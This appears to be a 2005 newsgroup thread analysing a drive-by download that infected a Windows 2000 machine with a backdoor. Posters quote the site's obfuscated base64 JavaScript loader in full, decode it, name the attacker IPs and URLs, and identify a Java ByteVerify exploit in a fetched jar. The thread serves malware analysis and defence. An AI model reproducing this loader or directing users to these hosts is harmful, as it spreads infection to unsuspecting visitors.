After visiting a website I found an executable named
\WINNT\Java\Javasys.exe running on my system.

Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
to access the Internet.

Just to see what would happen, I allowed it to access the Internet and
it downloaded another executable, which triggered a Zone Alarm security
alert:

"nnnm32 is trying to set 'antivirus' to run each time your computer is
started".

Actually the name of nnnm32.exe may vary: in a few tries I saw it named
comm.exe, ping.exe and so on.

Allowed to access the Internet, nnnm32.exe downloaded a third
executable (timer.exe) which in turn tried to access the Internet.


I then did a scan for spyware with the latest versions of all the
following:

ZoneAlarm 6 Pro
Ad-Aware 1.06r1 Personal (free)
SpyBot S&D 1.4
SpySweeper 4.04
Spyware Doctor 3.2.1.
AntiVIR Personal 6.31 (free)

but none of them found any threat (!)

A couple of weeks later, after downloading an updated virus definition
file, I scanned the system again with AntiVIR and this time it found in
timer.exe a backdoor named BDS/Webdor.AD.1


My configuration:

- Windows 2000 Professional SP4, IE6 Security set to "medium";
- ZoneAlarm Pro 6;
- AntiVIR Personal Edition 6.31 (free);
- SpyBot S&D 1.4 w/ Teatimer (resident antispyware).


For those interested, the URL spreading this malware is the following:

************************************************** *********
DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
http://198.88.20.158/gal/403/index.html
************************************************** *********

My question is: How can I prevent any executable to install in such an
insidious way?

With IE6 Security set to "High" this malware could not install, but of
course I would like to keep IE6 Security set to "Medium", otherwise
navigation is most unpractical.

Thank you in advance for any advice.

You can use any website you want. The only thing to care about is:

I will write this in big letter, that everyone sees the importance...

DON'T USE THE ADMINISTRATOR ACCOUNT FOR SURFING OR EVEN WORKING!!!

Only use it to install soft- or hardware. And only that kind of software
you got from a source you can trust.

I suggest everyone (EVERYONE) to read a book about security!

MaxPower wrote:
<snip>.
Since the attack starts with a javascript, I suspect that disabling
javascript would be the only sure way of preventing this particular
attack. No matter what browser you are using. Which of course you do
by setting your security to high.

With that said, this particular script seems to be looking for Internet
Explorer so it may be exploiting a flaw in that particular browser.
Keep in mind I didn't go through the entire process of infecting my
machine so I'm not sure about this. But, if this is the case, using a
different browser may have prevented this particular attack.

What might be interesting is if anyone knows of something that could
block 'suspicious looking' scripts without totally disabling javascript.

I ask because I found the first one to be suspicious mainly because of
the attempts to obfuscate the code. I.E. it's all smooshed into one
line and the meat of it is base64 encoded.

The index.html attempts to download this:

<SCRIPT language="JavaScript"
SRC="http://198.88.20.158/iSponsor.js?bannerid=403"></SCRIPT>

That script is: (line breaks inserted by my news client)

var b64, f64,d;function a(s){var i;for (i=0;i<s.length;i++)if
(!s[i])s[i]=1;return s;}function u(d){var r=new Array; var i=0;while(i
<d.length){if (d[i]<128){r[r.length]=String.fromCharCode(d[i]);i++;}else
if((d[i]>191)&&(d[i]<224)){r[r.length]=String.fromCharCode(
((d[i]&31)<<6)|(d[i+1]&63));i+=2;}else{r[r.length]=String.fromCharCode(((d[i]&15)<<12)|((d[i+1]&63)<<6)|(d[i+2]&63));i+=3;}}return
r
..join("");}function t(t){var d=new Array;var
i=0;t=t.replace(/\n|\r/g,"");t=t.replace(/=/g,"");while(i<t.length){d[d.length]=(f64[t.
charAt(i)]<<2)|(f64[t.charAt(i+1)]>>4);d[d.length]=(((f64[t.charAt(i+1)]&15)<<4)|(f64[t.charAt(i+2)]>>2));d[d.length]=(((f64[t.charA
t(i+2)]&3)<<6)|(f64[t.charAt(i+3)]));i+=4;}if
(t.length%4==2)d=d.slice(0, d.length-2);if
(t.length%4==3)d=d.slice(0,d.length-1);retu
rn d;}function b(s){var
b64s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqr stuvwxyz0123456789+/';b64=[];f64=[];for(var
i=0;i<b64s.len
gth;i++){b64[i]=b64s.charAt(i);f64[b64s.charAt(i)]=i;}return
u(a(t(s)));}eval(b("ZnVuY3Rpb24gX19pbmNyZW1lbnRfY2 91bnRlcigpe3ZhciBjb3V
udD05MDEyODM7Y291bnQrKzt9O2Z1bmN0aW9uIF9fX2RvX2NoZ WNraW5nKCkgewp2YXIgY2Fwcz1kb2N1bWVudC5nZXRFbGVtZW5 0QnlJZCgnX19fY19jYXBzJyk7dmFyIGN
UeXBlPTA7dmFyIHZlcnNpb249MDtpZiAoKHR5cGVvZihjYXBzK SE9J3VuZGVmaW5lZCcpJiYodHlwZW9mKGNhcHMuY29ubmVjdGl vblR5cGUpIT0ndW5kZWZpbmVkJykmJih
0eXBlb2YoY2Fwcy5nZXRDb21wb25lbnRWZXJzaW9uKSE9J3VuZ GVmaW5lZCcpKXsKY1R5cGU9Y2Fwcy5jb25uZWN0aW9uVHlwZTs KdmVyc2lvbj1jYXBzLmdldENvbXBvbmV
udFZlcnNpb24oJ3swOEIwRTVDMC00RkNCLTExQ0YtQUFBNS0wM DQwMUM2MDg1MDB9JywnQ29tcG9uZW50SUQnKTsKdmFyIHNWZXJ zaW9uID0gY2Fwcy5nZXRDb21wb25lbnR
WZXJzaW9uKCd7MDhCMEU1QzAtNEZDQi0xMUNGLUFBQTUtMDA0M DFDNjA4NTAwfScsJ0NvbXBvbmVudElEJyk7dmFyIHNzOwp2YXI gc3NudW07c3MgPSBzVmVyc2lvbi5zcGx
pdCgnLCcpO3NzbnVtID0gcGFyc2VJbnQoc3NbMl0pOwppZiAoY 2Fwcy5jb25uZWN0aW9uVHlwZT09J21vZGVtJyAmJiBzc251bSA 8IDM4MTApewpfX2luY3JlbWVudF9jb3V
udGVyKCk7ZG9jdW1lbnQud3JpdGUoJycpO31lbHNle2RvY3VtZ W50LndyaXRlKCcnKTt9fWVsc2V7c2V0VGltZW91dCgnX19fZG9 fY2hlY2tpbmcoKScsMjAwKTt9fTtpZiA
oKG5hdmlnYXRvci5hcHBOYW1lPT0nTWljcm9zb2Z0IEludGVyb mV0IEV4cGxvcmVyJykmJih0eXBlb2YoZG9jdW1lbnQuYWxsKSE 9J3VuZGVmaW5lZCcpKXtkb2N1bWVudC5
3cml0ZSgiPGRpdiBpZD0nX19fY19jYXBzJyBzdHlsZT0nZGlzc GxheTpub25lOyBiZWhhdmlvcjp1cmwoI2RlZmF1bHQjY2xpZW5 0Y2FwcyknPjwvZGl2PiIpO19fX2RvX2N
oZWNraW5nKCk7fTtkb2N1bWVudC53cml0ZSgiPCEtLSBQUk9NT 1RJT04gQVJFQS0tPiAgICAgIDxkaXYgYWxpZ249J2NlbnRlcic +PGZvbnQgZmFjZT0nQXJpYWwsIEhlbHZ
ldGljYSwgc2Fucy1zZXJpZicgc2l6ZT0nNCc+PGEgaHJlZj0nJ yB0YXJnZXQ9J19ibGFuayc+PC9hPjwvZm9udD48L2Rpdj48IS0 tIEVORCAtLT4gICAgICAgICIpOw=="))

The base64 encoded part roughly decodes to:

function __increment_counter(){var count=901283;count++;
};
function ___do_checking() {
var caps=document.getElementById('___c_caps');
var cType=0;var version=0;
if
((typeof(caps)!='undefined')&&(typeof(caps.connect ionType)!='undefined')&&(typeof(caps.getComponentV ersion)!='undefined')){
cType=caps.connectionType;
version=caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');
var sVersion =
caps.getComponentVersion('{08B0E5C0-4FCB-11CF-AAA5-00401C608500}','ComponentID');var
ss;
var ssnum;ss = sVersion.split(',');ssnum = parseInt(ss[2]);
if (caps.connectionType=='modem' && ssnum <
3810){__increment_counter();document.write('');
}else{document.write('');
}}else{setTimeout('___do_checking()',200);
}};
if ((navigator.appName=='Microsoft Internet
Explorer')&&(typeof(document.all)!='undefined')){d ocument.write("<div
id='___c_caps' style='display:none;
behavior:url(#default#clientcaps)'></div>");___do_checking();
};
document.write("<!-- PROMOTION AREA--> <div align='center'><font
face='Arial, Helvetica, sans-serif' size='4'><a href=''
target='_blank'></a></font></div><!-- END --> ");

Keep in mind I'm not a programmer so I don't know exactly what the above
does, but I just find the obfuscation suspicious.

--
Mark

From: "MaxPower" <cardin@usa.com>

|
| After visiting a website I found an executable named
| \WINNT\Java\Javasys.exe running on my system.
|
| Almost immediately, ZoneAlarm told me that this Javasys.exe was trying
| to access the Internet.
|
| Just to see what would happen, I allowed it to access the Internet and
| it downloaded another executable, which triggered a Zone Alarm security
| alert:
|
| "nnnm32 is trying to set 'antivirus' to run each time your computer is
| started".
|
| Actually the name of nnnm32.exe may vary: in a few tries I saw it named
| comm.exe, ping.exe and so on.
|
| Allowed to access the Internet, nnnm32.exe downloaded a third
| executable (timer.exe) which in turn tried to access the Internet.
|
|
| I then did a scan for spyware with the latest versions of all the
| following:
|
| ZoneAlarm 6 Pro
| Ad-Aware 1.06r1 Personal (free)
| SpyBot S&D 1.4
| SpySweeper 4.04
| Spyware Doctor 3.2.1.
| AntiVIR Personal 6.31 (free)
|
| but none of them found any threat (!)
|
| A couple of weeks later, after downloading an updated virus definition
| file, I scanned the system again with AntiVIR and this time it found in
| timer.exe a backdoor named BDS/Webdor.AD.1
|
| My configuration:
|
| - Windows 2000 Professional SP4, IE6 Security set to "medium";
| - ZoneAlarm Pro 6;
| - AntiVIR Personal Edition 6.31 (free);
| - SpyBot S&D 1.4 w/ Teatimer (resident antispyware).
|
| For those interested, the URL spreading this malware is the following:
|
| ************************************************** *********
| DO NOT VISIT THIS URL UNLESS YOU WANT TO GET YOUR COMPUTER INFECTED!
| http://198.88.20.158/gal/403/index.html
| ************************************************** *********
|
| My question is: How can I prevent any executable to install in such an
| insidious way?
|
| With IE6 Security set to "High" this malware could not install, but of
| course I would like to keep IE6 Security set to "Medium", otherwise
| navigation is most unpractical.
|
| Thank you in advance for any advice.


Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe

It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
http://kixtart.org Kixtart is CareWare } three batch files, five Kixtart scripts, one Link
(.LNK) file, a PDF instruction file and two utilities; UNZIP.EXE and WGET.EXE. It will
simplify the process of using; Sophos, Trend and McAfee Anti Virus Command Line Scanners to
remove viruses, Trojans and various other malware.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in Normal Mode. This
way all the components can be downloaded from each AV vendor’s web site.
The choices are; Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file.

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
FireWall to allow it to download the needed AV vendor related files.

* * * Please report back your results * * *


--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm

MaxPower wrote:


I went to this site (I use linux/FreeBSD and have java off). Here is some
info for you:

The IP address range is owned by Verio. You might want to contact them about
this server:
OrgAbuseHandle: VAC5-ARIN
OrgAbuseName: Verio Abuse Contact
OrgAbusePhone: +1-800-551-1630
OrgAbuseEmail: abuse@verio.net

After looking at speedslim's records it appears that this is a spoofing
site...

Imhotep

Mark wrote:

((d[i+1]&63)<<6)|(d[i+2]&63));i+=3;}}return
{

....good job....

Im

hatschi wrote:

Yup! Good advice...

"Mark" wrote:

Keep up to date with your security patches, or don't use IE, and don't
visit such dubious sites.

In this particular case you could disable Java and lose very little
functionality. Note that Java is not the same thing as Javascript.
Sites tend not to use Java applets for navigation. However, the site
looks decidedly dodgy, so there could be other exploits lurking there
(e.g. for Active-X).

Or possibly any browser that uses an exploitable Java virtual machine.

[snip]

That's strange, I decoded the following for the above function
("document.write" line wrapped, and http munged to h--p)

function __increment_counter() {
document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
codebase=\"h--p://209.190.137.29/user/ds/\"
CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
<param name=\"userid\" value=\"global/ds-1\"></APPLET>");};

The file c.jar is a Java archive (a zip file) containing:

BB.class
Beyond.class
BeyondInterface.class
Dummy.class
Manifest.mf
VerifierBug.class

The file VerifierBug.class contains the Java byte verify exploit
(Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
open for the site to install its payload. I didn't dig further into
the site's code to see what that malware might be.

From: "Ant" <not@home.today>


< snip>

| The file c.jar is a Java archive (a zip file) containing:
| BB.class
| Beyond.class
| BeyondInterface.class
| Dummy.class
| Manifest.mf
| VerifierBug.class
|
| The file VerifierBug.class contains the Java byte verify exploit
| (Troj/BytVrfy-A) according to Sophos. Once this runs, your system is
| open for the site to install its payload. I didn't dig further into
| the site's code to see what that malware might be.
|

McAfee as well...
9/5/2005 6:35:38 PM Deleted (Clean failed) DLIPMAN-1\lipman D:\temp\IE6\Temporary Internet
Files\Content.IE5\WCZFECUD\c[1].jar\C[1].JAR Exploit-ByteVerify

and

9/5/2005 6:38 PM Infected DLIPMAN-1\lipman C:\Documents and
Settings\lipman\Desktop\VerifierBug.class Exploit-ByteVerify (Trojan) (Removable)

Another case of a .CLASS file in a Java Jar (ZIP type file) having an infector. This is why
you must enable "scan archive files" in any/all anti virus products.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
http://www.ik-cs.com/got-a-virus.htm

Ant wrote:
Much better put than what I was trying to say.

True, I was just guessing because the javascript I downloaded appeared
to be looking for Internet Explorer.

That is quite interesting. From what you saw, does the method of
getting the script change which script you get? What you got looks much
more interesting.

All I did was "wget http://198.88.20.158/iSponsor.js" from one of my
linux boxes. In all honesty, I was being lazy and probably shouldn't
have posted without all the information.

--
Mark

"Mark" wrote:

It could do, depending on how the server is set up to respond to your
HTTP request headers. For example, some will serve different content
based on the "User-Agent" field. I only tried one method, which was to
prefix "view-source:" to the URL in the IE address box. This just
fetches (GETs) the item into notepad without running or rendering
anything in the browser.

That's the same URL I used (without the "?bannerid=403" after it).
Perhaps the site doesn't like wget, perhaps iSponsor.js changes from
time to time, or perhaps it's something else I don't know about. You
could tell wget to use a User-Agent string like IE or Mozilla sends,
and see if it makes a difference.

Not at all; you sparked my interest to find an exploit!